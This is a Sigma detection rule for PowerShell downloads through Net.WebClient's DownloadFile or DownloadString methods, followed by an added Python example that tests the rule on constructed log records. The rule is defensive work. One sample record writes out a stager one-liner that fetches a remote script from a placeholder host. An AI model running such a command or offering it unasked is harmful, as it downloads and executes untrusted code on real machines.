PowerShell Download Via Net.WebClient - PowerShell Classic
Detects PowerShell download activity, via the .DownloadFile() or .DownloadString() methods of the Net.WebClient class. This technique is often abused by attackers to download additional payloads.
Sigma rule
title: PowerShell Download Via Net.WebClient - PowerShell Classic
id: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d
related:
    - id: 65531a81-a694-4e31-ae04-f8ba5bc33759
      type: derived
status: test
description: |
    Detects PowerShell download activity, via the .DownloadFile() or .DownloadString() methods of the Net.WebClient class.
    This technique is often abused by attackers to download additional payloads.
references:
    - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
author: Florian Roth (Nextron Systems)
date: 2017-03-05
modified: 2026-04-28
tags:
    - attack.execution
    - attack.command-and-control
    - attack.t1059.001
    - attack.t1105
logsource:
    product: windows
    category: ps_classic_start
detection:
    selection_webclient:
        Data|contains: 'Net.WebClient'
    selection_download:
        Data|contains:
            - '.DownloadFile('
            - '.DownloadString('
    condition: all of selection_*
falsepositives:
    - This activity may be used by legitimate software, such as patch management tools or software updaters. Investigate any such activity and apply the necessary filter.
level: low
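To show how the `all of selection_*` condition behaves on realistic records, here is an added example (not part of the Sigma project or of this rule) that applies the two selections to constructed ps_classic_start Data fields; the record layout and the `.invalid` hostnames are assumptions made for the sample.

```python
WEBCLIENT_MARKER = "net.webclient"
DOWNLOAD_MARKERS = (".downloadfile(", ".downloadstring(")


def matches_rule(data: str) -> bool:
    """True when Data satisfies `all of selection_*`: it contains
    'Net.WebClient' AND one of the two download method calls.
    Sigma's `contains` is case-insensitive, hence the lowercasing."""
    text = data.lower()
    selection_webclient = WEBCLIENT_MARKER in text
    selection_download = any(m in text for m in DOWNLOAD_MARKERS)
    return selection_webclient and selection_download


def find_matches(events):
    """Indexes of ps_classic_start records whose Data field fires the rule."""
    return [i for i, ev in enumerate(events) if matches_rule(ev.get("Data", ""))]


# Constructed sample records (event 400 engine-start entries); hostnames use
# the reserved .invalid TLD so nothing here points at a real system.
SAMPLE_EVENTS = [
    # The one-liner the rule was written for: both selections match.
    {"EventID": 400, "Data": "HostApplication=powershell.exe -nop -c "
     "\"(New-Object Net.WebClient).DownloadString('http://files.example.invalid/stage.ps1')\""},
    # Vendor updater: 'System.Net.WebClient' still contains 'Net.WebClient', so it
    # also fires; this is the hit the falsepositives section says to filter.
    {"EventID": 400, "Data": "HostApplication=powershell.exe -c "
     "\"$wc = New-Object System.Net.WebClient; "
     "$wc.DownloadFile('https://updates.example.invalid/agent.msi', 'C:\\Temp\\agent.msi')\""},
    # Different download cmdlet: outside this rule's scope (see the related rules).
    {"EventID": 400, "Data": "HostApplication=powershell.exe -c "
     "\"Invoke-WebRequest -Uri http://intranet.example.invalid/notes.txt\""},
    # WebClient without a download call: only selection_webclient matches.
    {"EventID": 400, "Data": "HostApplication=powershell.exe -c "
     "\"$wc = New-Object Net.WebClient; $wc.Headers.Add('User-Agent', 'agent')\""},
]

if __name__ == "__main__":
    for i in find_matches(SAMPLE_EVENTS):
        print(f"ALERT event {i}: {SAMPLE_EVENTS[i]['Data'][:80]}...")
```

Running it flags events 0 and 1 only; the second hit is exactly the legitimate-updater case the rule's falsepositives entry expects you to filter per environment.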
Related rules
- Command Line Execution with Suspicious URL and AppData Strings
- Potential DLL File Download Via PowerShell Invoke-WebRequest
- Netcat The Powershell Version
- Kalambur Backdoor Curl TOR SOCKS Proxy Execution
- Suspicious Deno File Written from Remote Source